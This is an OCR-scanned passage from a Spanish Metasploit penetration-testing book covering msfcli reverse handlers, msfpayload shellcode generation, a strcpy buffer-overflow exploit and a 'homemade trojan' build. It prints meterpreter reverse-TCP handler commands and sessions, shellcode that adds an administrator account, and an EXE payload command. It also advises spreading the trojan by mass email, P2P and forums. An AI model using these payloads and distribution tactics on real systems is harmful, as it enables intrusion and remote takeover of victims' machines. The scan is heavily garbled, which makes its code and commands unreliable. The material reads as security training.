Hay  que  destacar  la  posibilidad  de  que  la  maquina  se  encuentre  detras  de  un  router,  lo  cual  implicari^ 
que  se  deberia  abrir  un  puerto  en  el  router  para  redirigir  el  trafico  y  que  este  pueda  llegar  desde 
Internet  hasta  !a  maquina  del  atacante. 

r?S€LTOR^MlJfEU  expl0it/multi/h8n,Jler  LH0ST=192. 160. 1.39  PAYLOAD^indows/raeterpreter/reverse 
Ml  Please  wait  while  we  load  the  module  tree. . . 


I  ]  -  M  O'l 

.  —.1  L _ I  1  _  |  i 

-  W  .  \  /  _J  ’  \|  ]/  M  l  "| 

1 1 1 1  /  u  1 1  l.  \  u  1 1  o  1 1  r 

LI  Ll\ _ l\„\__.„l _ /  *_/|_l\  /|  |\  "| 


*1  metasploit  v3. 7.0 release  fcore:3.7  apiil.B] 
t  --  --=[  684  exploits  -  355  auxiliary 
f  *■  "“l  217  payloads  -  27  encoders  -  8  nops 

LHOST  =>  192,168.1.39 

PAYLOAD  =>  windows/meterpreter/reverse  tcp 
LP0RT  =>  4444 

[*]  Started  reverse  handler  on  192.168.1.39:4444 
[*j  Starling  the  payload  handler... 

F  ig  5. 1 0:  Configuracion  de  msfcli  para  recibir  geslionar  o  recibir  sesiones  inversas. 

Una  vez  montada  loda  la  infraesfructura  por  parte  del  atacante  o  auditor  se  debe  esperar  a  que  las 
vlctimas  se  conecten  al  servidor  web  malicioso.  Como  ya  se  ha  mencionado  en  este  Jibro  se  piieder 
utilizar  diversas  tecnicns  para  provocar  que  las  vlctimas  visiten  dicho  servidor. 

Una  vez  que  la  victims  se  conecte  al  servidor  web  malicioso  se  lanzaran  los  exploits  sobre  ella,  y 
en  caso  de  que  esta  sea  vulnerable  se  lanzara  una  peticion  a  la  maquina  que  esta  configurada  con  el 
mnnejador  o  exploit/multi/handler ,  el  cual  al  recibir  la  peticion  inyectara  el  payload  en  la  maquina 
de  (a  victima  respondiendo  a  dicha  peticion. 

{*]  Started  reverse  handler  on  192.160.1.39:4444  ~  - — - ~i 

{+]  Starting  the  payload  handler.,. 

[*3  Sending  stage  (749956  bytes)  to  192.168.1.38 

i-040Bterpreter  S6SSi0n  1  °Pened  (192'168-1-3S:4'M4  ->  192.168.1.38:1030)  at  2012-08-13  29:58:44 

meterpreter  > 
meterpreter  >  pwri 
C:\WIND0WS\system32 
meterpreter  >  | 


Fig  5. 1 1 :  Obtencion  de  una  sesion  inversa  con  msfcli. 
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3.  Msfpayload:  payload  a  gusto  del  consumidor 

Msf  pay  load  es  una  tie  las  herramientas  mas  utiiizadas  del  framework  de  Metasploit.  Con  esla 
herramienta  de  llnea  de  comandos  se  puede  general-  codigo  ejecutabie  personalizado,  en  distintos 
lenguajes  como  puede  ser  C,  Perl  o  Ruby.  Este  codigo  permite  realizar  acetones  concretas,  mas 
llpicas  de  payloads  de  tipo  Inline,  o  montar  todo  un  servidor  de  opciones  en  una  maquina  vulnerada 
a  tra-ves  de  un  exploit ,  mas  tlpico  de  payloads  de  tipo  staged. 

La  I  tincionalidad  anterior  proporciona  a  ios  exploiters  la  posibilidad  de  disponer  de  gran  cantidad  de 
payloads  en  distintos  lenguajes  para  la  creacion  de  sus  exploits.  En  este  apartado  se  podra  estudiar  y 
comprobar  como  funciona  esta  herramienta  y  Ios  distintos  lenguajes  de  program  acton  que  soporta. 
Otra  de  las  Jimcionalidades  interesantes  que  proporciona  msfpayload  es  la  tie  crear  ejecutables  que 
dispongan  en  su  interior  un  payload  concreto.  De  este  modo  es  posible-  crear  ejecutables  maliciosos, 
que  puedan  proporcionar  al  ataeante  el  control  remoto  de  la  maquina  donde  se  ejecute  el  archive. 
Esta  tecnica,  que  es  la  mas  intuitiva  y  general izada,  se  puede  llevar  a  cabo  tanto  en  sistemas 
operativos  Windows ,  como  Unix.  En  este  apartado,  se  realizaran  dis-lintas  pruebas  de  concepto  donde 
se  estudiard  la  viabilidad  de  la  creacion  de  ejecutables  y  paquetes  DEB,  Debian. 

La  sintaxis  de  la  herramienta  es  realmente  intuitiva  y  sencilla,  como  se  puede  observar  en  la  siguienle 
llnea  msfpayload  [VARIABLES,  LHOST,  LPORT,  PAYLOAD]  <modo>.  Los  modes  proporcionan  a 
la  herramienta  gran  flexibilidad  y  loda  la  potencia  que  presents  al  auditor  o  ataeante. 

Por  ultimo,  hay  que  tener  en  cuenta  que  estos  archivos  pueden  scr  facitmenie  detectados  j>or  las 
bases  de  datos  de  firmas  de  Ios  antivirus.  Este  es  un  debate  muy  actual,  que  exisle  en  el  dla  a  dia  del 
peniestmg.  Existen  tecnicas  para  intentar  evadir  el  mayor  numero  de  sistemas  de  proteccion,  como 
puede  ser  un  antivirus,  y  se  estudiard  mas  adelante  en  el  presente  libro. 

Modos  de  msfpayload 

Los  modos  de  ejecucion  que  dispone  msfpayload  per  mi  ten  realizar  distintos  acciones  relacionadas 
con  Ios  payload.  En  la  imagen  se  pueden  visualizar  Ios  distintos  modos  que  msfpayload  pro'porciona 
al  auditor.  Es  posible  distinguir  entre  dos  modos  de  ejecucion  jcrarquicos,  el  primero  para  la 
obtencion  del  payload  en  un  lenguaje  de  programacion  y  el  segundo  para  la  creacion  de  binarios 
en  distintos  sistemas  operativos.  Cada  uno  de  estos  modos  tiene  distintas  variaciones  internas,  las 
cuales  se  pueden  ir  observando  en  este  apartado, 


rootQroot :-#  msfpayload 

Usage:  /opt/framework3/jnsf3/insfpayload  [<options>]  <pay!oad>  [var=val]  <[S]uawnary|C|  (PjerljR 
ub{y]j{R}awjp]s|e{X}e|[D]U|[V]BA|[UJar> 

Fig  5.12:  Modos  de  ejecucion  de  msfpayload. 

El  modo  S  o  summary  proporciona  in  form  acton  sobre  el  payload  que  se  quiere  utilizar.  Se  debe 
indicar  la  rula  del  payload  y  especificar  el  modo  de  ejecucion  al  final  de  la  instruccion.  Este  modo 
ayuda  al  auditor  a  conocer  las  variables  de  configuracton  del  payload  que  deben  ser  configuradas. 


tanto  para  la  obtencion  de  codigo  en  un  lenguaje  de  programacion  concreto,  como  para  la  generation 
de  binarios.  Ademas,  con  este  modo  se  proporciona  una  description  y  el  tipo  de  payload  q  ,ie  es,  por 
ejemplo  con  Meterpreter  se  indica  que  es  de  tipo  staged. 


rootgroot:-#  msfpayload  windows/nte terprete r/ reverse  tep  S 

Name:  Windows  (interpreter  (Reflective  Injection),  Reverse  TCP  Stager 
Module:  paylaad/winclows/meterpreter/iev&rsatcp 
Version:  1,8394,  8998,  8984 
Platform:  Windows 
Arch:  x8fi 
Needs  Admin:  No 
Total  s.i.7e:  298 
Rank:  Normal 

Provided  by: 

skape  <wdller@liick.org> 
s f  <stftpiiein;  f  ewe  r@ha  rmonysecu  rity .  co»> 
hdm  <hdn@ketasploit.co«i> 

Basic  options: 


Name 

Current  Setting 

Required 

Description 

EXITFUNC 

process 

yes 

Exit  technique:  seh,  thread,  process,  none 

LHOST 

yes 

The  listen  address  '  - 

LPORT 

4444 

yes 

The  listen  port 

Description: 

Connect  back  to  the  attacker,  Inject  the  meterpreter  server  DLL  via 
— the  Reflective  DU  Inlectian  pavload  (staged)  _ _ 

Fig  5. 13:  Ejecucidn  Summary  de  msfpayload. 

El  modo  C  u  obtencion  de  codigo  en  el  lenguaje  de  programacion  C,  proporciona  al  auditor  o 
exploiter  una  variable  definida  en  este  lenguaje,  con  el  valor  del  payload  que  debe  ser  ejeculado  en 
la  maquina  vulnerada. 


rootgroot:-#  msfpayload  windows/adduser  US£R=i64  PASS=pabloglez  C 

r 

*  windows/adduser  -  272  bytes 

*  http://www.aetasploit.com 

*  ExnruNOprocess,  USER=i64,  PASS=pabloglez 
V 

unsigned  char  buff)  = 

"\xfc\.xeB\xB9\X00\X00\x88\x68\x89\xe5\x31.\xd2\x64\x8b\x52\x38', 

"\X8b\x52\x8c\x8b\x52\xl4\x8b\x72\x28\X0f\xb7\x4a\x26\x31\xff" 

"^x31\xce\xac\x3c\xBl\x7c\x02\x2c\x20^xcl\xcf\x0d^xfl^\xc7\xe2,, 

“\xf0\x52\x57\x8b\x52\xl8\xBb\x42\x3c\x01\xd0\x8b\x40\x78\x85" 

"\xc0\x74\x4a\x81\xd0\x50\x8b\x48\xl8\x8b\x58\x20\x01\xd3\xe3" 

•' \x3c\x49\X8b\x34\xBb\x0l\xd6\x3  l\xf  f  \x31\xcG\xac\xc  l\xc  f  \xOd" 
“\x01\XC7\x38\xe8\x75\xf4\x03\x7d\xfB\x3b\x7d\x24\x75\xe2\x58" 
“\x8b\x58\x24\x01\xd3\x66\x8b\x8c\x4b\x8b\x58\xlc\x01\xd3\x8b" 
”\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" 
"\xe0\x58\x5f\x5a\x8b\xl2\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\xS0" 
"\x00\x00\x58\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf8Vxb5\xa2\x56" 
"\x6O\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\xea\x88\xfb\xe0\x75" 
"\x85\xbb\x47\xl3\x72\x6f\x6a\x88\x53\xff\xd5\x63\x6d\x64\x2e" 
"\x65\x78\x65\x28\x2f\x63\x28\x6e\x65\x74\x20\x75\x73\x65\x72” 
"\x20\x69\x36\x34\x20Vx70\x61\x62\xOc\x6f\X67\x6c\x85\x7a\x20'1 
“\x2ftx41\x44\x44\x28\x26\x2B\x28\x6e'iX65\x74\x20\x6c\x6f,\X63" 
'\X61\X6C\X67 \x72\x6f \X75\X70\X28\X4 1 \x64\x6d\x69\XGe\x69\x73" 
"\x74\x72\x6 I\x74\x6f \x72\X73\x28\x69\x36\x34\x26\x2 f \x4 l\x44 " 

Fig  5.14:  Obtencion  variable  en  C  del  payload  windows/adduser. 


Metasploit  para  Pent  esters 


0,8,11,0  se  esta  desarrollando  un  exploit,  estas  opciones  tie  msfpayload  son  realmente  utiles  y 
n^esarias  para  faciiitar  e!  proceso  de  obtencion  de  control  de  la  maquina  vulnerada.  En  el  ejemplo 
aUerior  se  uliliza  el  payload  windows/adduser  el  cual  creara  on  usuario  en  el  sisteina  donde  se 
eji  cute  con  una  contrasena  deftnida. 

Palfnja  obtencion  de  este  codigo  en  otros  lenguajes  de  programacion  se  dispone  de  los  modos  “y” 
y  P  ,  quc  se  corresponden  con  la  generacion  de  codigo  en  lenguaje  Ruby  ,y  Peri  respectivamente. 

'  ’am.ente  se  debe  especificar  el  payload,  las  variables  de  configuracion  de  dicho  modulo  y  la 
*“  ,e  ident,f!ca  el  modo  cie  ejecucion.  Si  se  requiere  obtener  codigo  en  Ruby  se  utiiiza  la  letra 
j  ’  u,l  y  co mo  se  puede  visualizaren  la  imagen. 


rootQroot:  *•#  tnsfpayload  windows/adduser  y 
#.  windows/adduser  -  2B7  bytes 
#  http :  //www. metasploit .  com 
■  »  exiTFUMC=process,  USERsinetasploit,  PASS=metasploit 

bilf  a 

,,\xfc\xe8\x89\x0B\x0e\xe0\x5B\x89\xe5\x31\xd2\x04\x8b\x5;>1'  + 

’  \x30\x8b\x52\xBc\x8b\x52\Xl4\x8b^x72\x28^x6f\xb7\x4a\x2C',  > 
-\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x2B\xcl\xcf\xed“  + 
"\xOt\xc7\xe2\xf0\x52\x57\x8b\x52\xl8\x8b\x42\x3c\x01\xd9“  + 
’,\x8b\x40\x78\xB5\xc0\x74\x4a\x01\xd3\x50\xOb\x4B\xl8\xCb"  + 
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff"  + 
"\x31\xc0\x3c\xcl\xcf\x0d\x01Vxc7\x38\xe0\x75\xf4\x03\x7d"  + 
“\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x68\x8b°  * 
'VBcWbXxebXxSBXxlcXxetSxdBXxBbWVfBbXxeiVxdeXxBgVx*^  h 
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\xfih"  + 
"\xl2\xeb\x86\x5d\x6a\x01\x8d\xfl5\xb9\x00\xe0\x00\x50\x68‘-  + 
“\x31\x8b\xSf\x87\xff\xd5\xbb\xf8\xb5\xa2\x56\x68\xa6\x95*  >, 
”\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"  + 
'’\x47\xl3\x72\x6f\xBa\x00\x53\xff\xd5\x63\x6d\x64\x2e\xD5”  «• 
"\x78\x65\x20\x2f\x63\x29\x6e\x65\x74\x20\x75\x73\x65\x7?“  f 
“\X20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x6d\xfi.'>"  -I 
■*\x74\x6t\x73\x78\x6r.\x6f\x69\x74\x20\x2f\x41\x44\x44\x20"  + 
“\x26\x26\x20\x6e\x65\x74\x20\x5c\x6f\x83\x61\x6c\x67\x72‘  ♦ 
“\x6f\x75\x70\x20\x41\x64\x6d\x69\xSe\x69\x73\x74\x72\x6l”  f 
j"\x74\x8f\x72\x73\x2Q\x6d\x6S\x74\x61\x73\x70\x6c\x6f\x69“  +  j 

Mg  5. 1 5:  Obtencion  variable  en  Ruby  del  payload  windows/adduser. 

El  modo  R  o  raw  permite  obtener  codigo  en  lenguaje  maquina.  Como  curiosidad  indicar  que  en  e! 
ejempio  se  pueden  obscrvar  los  strings  y  las  ordenes  que  se  estan  asignando  en  e!  codigo  maquina. 
Se  puede  visualizar  facilmente  Ja  accion  que  reaiiza  el  payload,  donde  se  abre  un  cmdy  se  ejecutan 

laf  ordenest  t,c  aMr  un  tlsuario  °o«  una  contrasena  y  ndemas  se  agrega  el  usuario  al  gmno  de 
admimslradores  de  la  maquina. 


root(3r  oot;  •#  msf paylcaa  windows/adduser  R 
i>W  Wied&RB&R 

"ser  ,6,MPl“t  *et*spl°it  /<DD  “  "•  locala roup  Administrators  mot 


F:g  5. 1 6:  Obtencion  de  codigo  maquina. 


Rl  modo  X  o  eject, ci6n  permite  obtener  codigo  ejecutable  en  formato  EXE  para  sistemas  operatives 
Aincbw.i.  Existen  otras  opciones  o  modos  que  proporcionan  funcionalidades  para  crear  DLLs, 
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codigo  VBA  o  Javascript.  Mas  adeiante,  se  estudian  los  resul 
ejecucion  o  X. 


:  m 


tados,  mas  que  interesantes,  del  mod 


FoC:  Obtencion  de  payload  para  implementation  en  exploit 

hn  esta  prtieba  de  concepto  se  presenta  el  desarrolio  de  un  pequeiio  programa  en  el  lenguaje  de 
piogiamacion  C,  el  dial  sera  vulnerable  a  buffer  overflow ,  la  cual  como  se  ha  mencionado  en  este;. 
libro  es  una  de  las  vulnerabilidades  mas  comunes  en  el  desarrolio  de  aplicaciories. 

i 

En  esta  prueba  de  conceplo  no  se  pretende  ensenar  el  complejo  mimdo  del  reversing ,  pero  si  explicar 
como  funciona  un  buffer  overflow  y  como  con  Metasploit  se  puede  obtener  el  codigo  de  un  payloac 
para  aiiadir  a!  codigo  del  programa  vulnerable.  A  continuacion  se  presenta  aplicacion,  eserita  ei 
lenguaje  C,  vulnerable. 

fl include  <st.dio.!i> 

int  main  (int  arge,  char  '**argv) 

t 

char  buf (10] ; 
printf ("holamundo") ; 
a  t  ropy (bu  f , a rgv { 1 ] ) ; 
return  0; 

) 


Realmente,  ^que  se  busca?  Se  quiere  controlary  modificar  los  registros  del  procesador,  sobretodo  el 
registro  EIP  o  conlador  de  programa,  el  registro  ESP  el  cual  apunta  a  la  cima  de  la  pila  y  el  registro 
•REIN  que  indica  la  direccion  de  retorno  de  una  tun  cion.  El  registro  EIP  iiidica  que  instriiccidn 
se  ejecutara  a  continuacion  y  puede  proporcionar  a  un  atacante  la  posibilidad  de  ejecutar  las 
instrucciones  quc  cl  quiera  y  en  la  zona  de  memoria  que  el  necesite.  Es  eviclente,  que  la  zona  de 
memoria  que  se  requiera  albergani  el  shellcode  quo  se  quiera  ejecutar  para  realizar  alguna  accion 
concreta  sobre  la  maquina  vlctima  o  tomar  ei  control  total  de  dicho  equipo. 

;  El  programa  es  vulnerable?  Ea  respnesta  es  si,  este  codigo  no  limila  el  acceso  a  la  memoria  y  se 
puede  sobrescribir  liiera  de  los  llmites  que  el  sislema  operativo  ha  destgnado  para  la  ejecucion  de  la 
aplicacion.  Si  el  usuario  manipula  ia  entrada  y  sobrepasa  los  llmites,  se  podra  acceder  a  otras  zonas 
de  memoria  y  controlar  ios  registros  que  interesan.  En  el  caso  de  la  aplicacion,  la  funcion  vulnerable 
es  slrcpv  ya  que  en  ningun  instante  se  eomprueba  que  la  variable  argvfl ]  pueda  ser  copiada  en  un 
ospacio  de  memoria  reservado  de  1 0  bytes,  representados  por  la  variable  buf, 

El  primer  paso  es  ejecutar  el  programa  y  comprobar  que  si  se  introduce  en  argvfl]  un  valor  inferior 
o  igual  a  10  caractcres  la  aplicacion  funciona  correctamente,  pero  si  se  introduce  un  valor  superior  a 
i  0  earacteres,  cuando  la  funcion  strepy  intente  realizar  la  copia  en  la  variable  buf,  la  cual  dispone  de 
una  zona  de  memoria  reservada  de  10  bytes,  se  producira  un  error.  Lo  que  esta  ocurriendo  es  que  se 
esta  sobrescribiendo  una  zona  de  memoria  no  reservada  para  la  variable  buf. 

A  continuacion  se  presenta  graficamente  lo  explicado  anteriormente.  Antes  de  que  la  aplicacion 
real  lee  la  llamada  a  la  funcion  strepy  se  prepara  ia  pila,  la  cual  recoge  la  direccion  de  retorno  de  la 
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funcion,  las  variables  interims  del  compiiador  y  las  variables  locales  de  la  funcion.  En  esta  prueba  de 
concepto  las  variables  locales.de  la  fdncion  son  un  puntero  del  buffer  de  10  caracteres,  un  puntero  a 
la  variable  agrvflj  y  el  contenido  local  del  buffer. 

IpIIpIIfeffOT 

oI1Iff08  ISfIs  ft£UI  ho  al23‘  puntero  a  argv[l]  zona 

Oel2FF0C  0^101226  HCf  RETURH  frm  pfueba,  08401 2£4  to  jwweba.  0640122B 
O032FFIQ  O022FFIS  i  "■ 

0022PF14  766F9E34  4Xqv  BETURH  (ran  nsycrt.  ?6$P9E3£  to  , 766F9634 

0022FF18  0822FF68  h  Contenido  de  losiOcaracferes 

O022FF1C  00401046  F>®.  RETURN  #ron  nswor* <  764F2SC0  to  rmiebti.  00401046  j 


: OO22FF20  06402090  .  6. 
i  O022FF24  00462004  ♦  ®. 
0022FF23  6022FF68  h  ”, 
0022FF2C  1 0040 1 9F4  mm 
0022FF36  r 00009002  6. . . 


Espacio  local  pila.,, 
mm*  Direccibn  retorno  de  la  funcion 


Fig  5.17:  Eslado  de  la  pila  en  el  inslante  previo  de  la  ejecueion  de  ia  liamada  a  strcpy. 

Si  en  la  ejecueion  del  programa  se  le  ha  pasado  como  primer  argumento,  en  argvfl /,  un  valor 
superior  a  10  caracteres,  como  por  ejempio  “bolal234aaaaaaaaaaaaaaa”,  se  producira  seguramente 
la  calda  tic  la  aplicacion.  ^Por  que?  Es  sencillo,  en  este  ejempio  hay  un  espacio  en  fa  pila  para 
albergar  10  caracteres  y  la  funcion  strcpy  intenta  aiojar  mas,  se  esta  sobrcscribiendo  memoria,  por 
debajo  de  los  llmites. 

Entonces,  muy  probablemente  se  este  sobrescribiendo  el  valor  de  la  ultima  instruccion  que  se  ejecuta 
en  la  pila,  la  dial  es  la  direccibn  de  retorno  de  la  funcion  o  RETN.  En  la  siguiente  imagen  se  puede 
visualizar  de  manera  muy  intuitiva. 


mmmmtettm  is  '.flscnsjtho 

0022FF14  766F9E34  4xov  RETl,rVM  - . *  wwi**  ‘ . . 

0022FF18  S16C6F6S  c.ou  Contenido  del  buffer  =  ho!al234aaaa... 

U022FFIC  34333231  1234 
0022FF29  61616161  aaaa 
6022FF24  61616161  aaaa 
0622FF28  61616161  aaaa 

9®^F[:£C  f }0{0{0{  aaaa  4-  Direccibn  retorno  apunta  a  61616161  =  aaaa 

0022FF30  61616161  aaaa  r 

6022FF34  61616161  aaaa 
6022FF38  61616161  aaaa 
0022FF3C  61616161  aaaa 

0O22FF4OI  7FFD3eOCi| ,  0>  a| _ 

Fig  5.18:  Eslado  de  la  pila  en  el  inslante  previo  a  finalizar  la  ejecueion  de  la  funcion  strcpy. 

Hasta  ahora  se  ha  aprendido  como  causar  una  calda  de  una  aplicacion  haciendo  que  la  direccion  de 
retorno  a  una  zona  no  controlada  o  no  autorizada.  fY  si  se  quiere  ejecutar  codigo  arbitrario?,  ^Donde 
debe  introducirse  el  shellcode ?  El  shellcode  debe  introducirse  en  la  pila  justo  debajo  de  la  direecioii 
de  retorno.  '.Por  que  debajo?  Cuando  se  ejecute  la  direccion  de  retorno  se  desapilara  y  en  la  cima  de 
la  pila  quedara  la  primera  instruccion  del  shellcode. 


Ahora  hay  que  conseguir  que  se  ejecute  la  primera  instruccion  del  shellcode.  Para  elio  la  direccion 
de  retorno  de  la  pila  debe  ser  una  direccion  que  contenga  una  instruccion  de  salto  incondicional  a  la 
pila,  JMP  ESP. 
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smi-za  m 

75141224 

75141225 

75141226  v 

751-11228 

7514122B 

7514122C 

7514122E 

75141230 

75141233 

7514123? 

7514123B  v 

75141230 

7514I23E 

75141243 

75141246  v 

75141248 

7514 124B 

7514124C 

75141252 

7514 12S5 

75141268 

75141255 

76! 41 261  - 

751 -1 1266 

75141267 

75 14 1262  v 

75141270 

75141272 

75141273 

75141277 

.3141278 

7-M.1 1 57P 


FFEB 
CO  £8 
6FS6FF 

FF83  C03CFF75 

C4FF 

78  0  4 


64:fil  18080000 
8340  38 
FF70  IS 
FF15  14101375 
8950  00 
E9  80FDFFFF 
Ffl 

101476  1111147! 
EB  CO 
14  75 


FOP  SS 

JME  SHORT  75141237 

TEST  BYTE  PTR  OS;  1504-33, BH 

OB  FF 

JMP  EBX 

HIT  058 

orps  y.m?,ym7 

I M0  DWORD  PTR  DS: [EBX+7SFF3CC0] 

LES  EDI, EDI 
JO  SHORT  75141241 
PUSH  ESI 
CflLL  75 13671:2 

MOO  EflX,  DWORD  PTR  SS:  [E6P-3C1 
JMP  SHORT  7514120E 
PUSH  DWORD  PTR  SS.-EEBP-391 
PUSH  EBX 

MOW  EflX, DWORD  PTR  FS: [ 183 
IIOU  EflX, DWORD  PTR  DS:  tEflX+303 
PUSH  DWORD  PTR  DSsCEflXH83 
CALL  DWORD  PTR  08:1751310143 
MOU  DWORD  PTR  SS: 1E8P-303 , EBX 
JI1P  75140FE6 
CLI 

fiDC  BVTE  PTR  OS: CES1*2+?5141 1 11  J,DL 

JMP  SHORT  - : - 

ROC  RL.75  I 


•  Add  comment... 


ass  3 

Modification  of  segnent  register 


[illegal  use  of  register 


•  <•  Registers  1FPUV 
EflX  766F2804  nit*. 
Ei'X  00000000 
EDX  00101  IDS  DC  Hi 
EBX  7FF06000 
ESP  0022FF5I 
ESP  00221 T  Si 
LSI  OOOOUOO'i 
...  ED!  00000000 
Li  E1P  7513897D  IfcKI 


Intermaduiar  calls 


Colon  (:) 
■  Space 
Semicolon  (;} 


:  New  origin  here 
Follow  in  Dump 


Sequence  of  commands... . 


Search  again 
j  Search  revetSe 

All  commands... 

:  All  command  sequences... 


i  Ail  referenced  strings 
:  AH  user  comments 
All  floating  constants 


Fig  5.19:  Localizacion  de  una  instruccion  de  salto  incondicional  a  la  pila. 

Una  vez  locaiizada  la  direccion  que  contiene  este  tipo  de  instruccion  ya  se  dispone  de  to  necesario 
para  volver  a  Ia  pila  cuando  el  usuario  requiera.  Justo  debajo  de  la  direccion  de  retorno  se  debe 
sobrescribir  el  shellcode.  Como  ejempio  se  presenta  la  siguiente  entrada  a  la  aplicacion  anterior, 
“holaI234aaaaa<dimccion  jmp+esp><shellcode>  ” .  La  primera  parte  de  la  entrada  es  “basura” 
para  ilegar  a  la  direccion  de  retorno  de  la  pila,  que  es  parte  imprescindible  de  la  entrada.  La  iercera 
parte  de  la  entrada  son  las  instrucciones  en  hexadecimal  del  shellcode. 

En  la  generacion  del  shellcode  entra  en  juego  Melasploit  y  la  herramienta  tnsfpayload.  Hay  que  tener 
en  cuenta  que  hay  que  eliminar  los  bytes  \x00  ya  que  produciran  un  final  de  cadena  y  hard  que  el 
exploit  no  se  ejecute  completamente. 

Tras  generar  el  shellcode  se  puede  declarar  una  variable  en  el  interior  del  codigo  en  C  dbn.de  se 
anexen  la  parte  denominada  anteriormente  “basura”,  la  direccion  de  retorno  en  hexadecimal  la 
cual  apunte  a  una  instruccion  JMP  ESP  y  por  ultimo  el  codigo  en  hexadecimal  proporcionado  por 
msfpayloud.  Esta  variable  sera  la  que  se  pase  a  la  funcion  strcpy,  en  vez  de  utilizar  arvgfl]  como  en 
el  caso  original. 


PoC:  Creadon  de  un  troyano  casero 

En  esta  prueba  de  concepto  se  creat'd  mediante  la  herramienta  tnsfpayload  m  ftchero  ejecutable 
para  sistemas  Windows.  Este  ejecutable  dispondra  en  su  interior  de  un  payload,  el  cual  sera  elegido 


por  el  atacante  o  auditor  con  el  proposito  de  realizar  una  funcionalidad  concreta  o  un  conjunto  de 
funcionalidades. 

Para  !a  creacion  del  fichero  binario  se  elegira  d  payload  oonacido  como  Meterpreter.  La  conexion 
que  He  vara  a  cabo  el  payload  sera  inversa,  reverse Jcp.  Hay  que  tener  en  cuenta  las  variables  que  se 
deben  configiirar  en  el  instante  de  crear  un  ejecutable. 

Hs  recomendable  mezclar  este  ejecutable  con  otro  tipo  de  archivos,  ya  que  en  el  momenlo  en  ei 
quo  la  victima  ejecute  el  binario  aparentemente  no  ocurrira  ninguna  accion.  Tanto  esta  ultima 
recomendacidn,  como  la  distribucion  de  este  archivo,  pueden  ocasionar  un  debate  amplio  en  el 
ambilo  de  la  seguridad  informatica,  acerca  de  la  mejor  manera  de  realizar  dichas  acciones.  Como 
se  ha  meneionado  en  este  libro,  una  via  podria  ser  la  utilizacibn  de  erivio  masiv’o  de  e-mails  en  una 
empresa. 


A  continu  acton  se  enumeran  las  opciones  a  tener  en  cuenta  para  la  creacion  del  ejecutable,  o  como 
se  ha  denorainado  en  la  prueba  de  concepto,  la  creacion  de  un  troyano  casero. 

El  payload.  Para  la  prueba  de  concepto  se  utiliza  un  Meterpreter,  pero  en  algunos 
ocosiones  puede  ser  interesante  utilizar  otro  payload  que  simplemente  ejecute  cierta  accion 
en  el  sistema  de  manera  silenciosa,  por  ejemplo  windows/addmer.  Si  un  atacante  dispone  de 
acceso  a  la  maquina  victima,  en  un  posible  ataque  dirigido,  se  podria  utilizar  dicho  payload 
para  lograr  acceso  fisico  como  administrador  de  la  maquina. 

Ai  set  un  payioad  de  conexion  inversa,  las  variables  que  deben  ser  corifiguradas  en  el 
modulo  del  payload  son  LHOST  y  LPORT.  La  variable  LHOST  representa  la  direccion  I  P 
do  In  maquina.  del  atacante,  donde  se  recibiran  las  conexiones  de  Meterpreter  medianle  !a 
utilizaeion  de  la  herraniienta  ms  fell  Por  otro  lado  la  variable  LPORT  representa  el  puerto  de 
la  maquina  del  atacante  donde  se  escucharan  las  sesiones  inversas. 


rootQroot msf payload  windows/meterpreter/reversetep  LHOST-192 . 163 . 1 . 39  LP0RT=4444  X  >  troyan 

Created  by  msfpsyload  {http://'rfww.metasploit.coin). 
npyload:  windows/meterp retar/ reverse  tep 
Length :  290 

Options:  {‘'LH0STJ,~>“192.168.  L39“,  "LPCRT’^^-T } 

Pig  5,20:  Creacion  de  un  ejecutable  con  el  payload  Meterpreter. 


Iras  la  creacion  del  ejecutable,  este  se  debe  distribuir  entre  los  objetivos,  si  el  ataque  fuem 
dmgido.  La  imagination  es  uno  de  los  puntos  a  tener  en  cuenta  en  este  aspecto.  Como  se  menciono 
anteriormente  una  de  las  vfas  posibles  serfa  el  envlo  masivo  de  mails  contra  una  organizacton,  Si  el 
ataque  iuera  no  dirigido,  las  posibles  vias  de  distribucion  aumentan,  como  por  ejemplo  compartir  el 
archivo  en  redes  P2P,  subirlo  a  servidores  de  desearga  y  eniazario  en  foros,  etcetera. 


Ahora  hay  que  esperar  a  recibir  las  sesiones  inversas  de  las  maquinas  victimas.  Para  ello  se  utiliza  la 
herraniienta  msfcli  mediante  la  configuration  del  modulo  exphit/multi/handler.  La  configuration  dc 
este  modulo  es  realmente  sencilla  y  ya  se  ha  explicado  en  el  presente  libro.  Hay  que  tener  en  cuenta 
que  c\  payload  debe  coincidir  con  ei  configurado  en  el  ejecutable. 


root@roat:-#  ms  fcli  exploit/multi/handler  LH0ST=192 .168.1.39  LP0RT=4444  PAYLOAD=windows/meterpre  I 
ter/rsversetep  E  ' 
[*]  Please  wait  while  we  load  the  module  tree... 


\  _  \  _j  i  _i .....  \  i  _  \  i  _i 
1  I  l  l\_  \  !  lit  ill' 
J\ _ IVJ\ . -.i  „/•__/  IN _ ✓  l\  I 


metasploit  v3.7.(M-elea5e  {core:3.7  api:1.8] 
+  --  ---I  684  exploits  -  355  auxiliary 
■r  --  *”=[  217  payloads  -  27  encoders  -  8  nops 

LHOST  =>  192,168.1.39 
LPORT  =>  4444 

PAYLOAD  =>  windows/meterpreter/reverse  tep 
[*}  Started  reverse  handler  on  192.168.1.39:4444 
l.4J  Starting  the  payload  handler... 


Fig  5.21:  A  la  escucha  de  sesiones  inversas  con  msfcli. 


Cuando  las  victimas  ejecuten  el  binario  en  sus  sistemas  Windows  el  payload  devolvera  el  control 
de  la  maquina  en  la  direccion  IP  donde  se  ha  configurado  msfcli.  En  este  momento  el  atacanti 
tieiie  control  total  sobre  las  acciones  que  se  pueden  realizar  en  diclia  maquina.  Hay  que  recorda| 
que  ias  posibilidades  que  ofrece  Meterpreter  son  infmitas  y  pueden  ser  consultadas  en  su  capitulq 
correspondiente. 


=(  metasploit  vV 7.9- release  icore:3.7  ap.i:1.0’ 

+  --  --=(  684  exploits  -  355  auxiliary 
